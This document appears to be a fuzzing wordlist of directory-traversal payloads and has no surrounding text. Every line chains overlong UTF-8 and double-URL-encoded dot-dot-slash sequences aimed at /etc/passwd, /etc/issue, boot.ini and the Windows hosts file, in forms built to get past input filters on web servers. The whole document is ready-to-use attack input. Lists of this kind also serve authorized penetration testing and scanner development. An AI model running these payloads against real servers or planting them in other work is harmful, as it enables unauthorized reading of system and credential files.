-%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025etc%uF025passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025etc%uF025issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025etc%uF025passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025etc%uF025issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025etc%uF025passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025etc%uF025issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025etc%uF025passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025etc%uF025issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66etc%%32%%66passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66etc%%32%%66issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66etc%%32%%66passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66etc%%32%%66issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66etc%%32%%66passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66etc%%32%%66issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66etc%%32%%66passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66etc%%32%%66issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66etc%%32%%66passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66etc%%32%%66issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66etc%%32%%66passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66etc%%32%%66issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63etc%%35%%63passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63etc%%35%%63issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63etc%%35%%63passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63etc%%35%%63issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63etc%%35%%63passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63etc%%35%%63issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63etc%%35%%63passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63etc%%35%%63issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63etc%%35%%63passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63etc%%35%%63issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63etc%%35%%63passwd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63etc%%35%%63issue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63boot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63%fc%80%80%80%80%ae%fc%80%80%80%80%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afetc%e0%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afetc%e0%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afetc%e0%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afetc%e0%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afetc%e0%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afetc%e0%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afetc%e0%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afetc%e0%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afetc%e0%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afetc%e0%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afetc%e0%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afetc%e0%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cetc%25c1%259cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cetc%25c1%259cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cetc%25c1%259cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cetc%25c1%259cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cetc%25c1%259cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cetc%25c1%259cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cetc%25c1%259cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cetc%25c1%259cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cetc%25c1%259cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cetc%25c1%259cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts 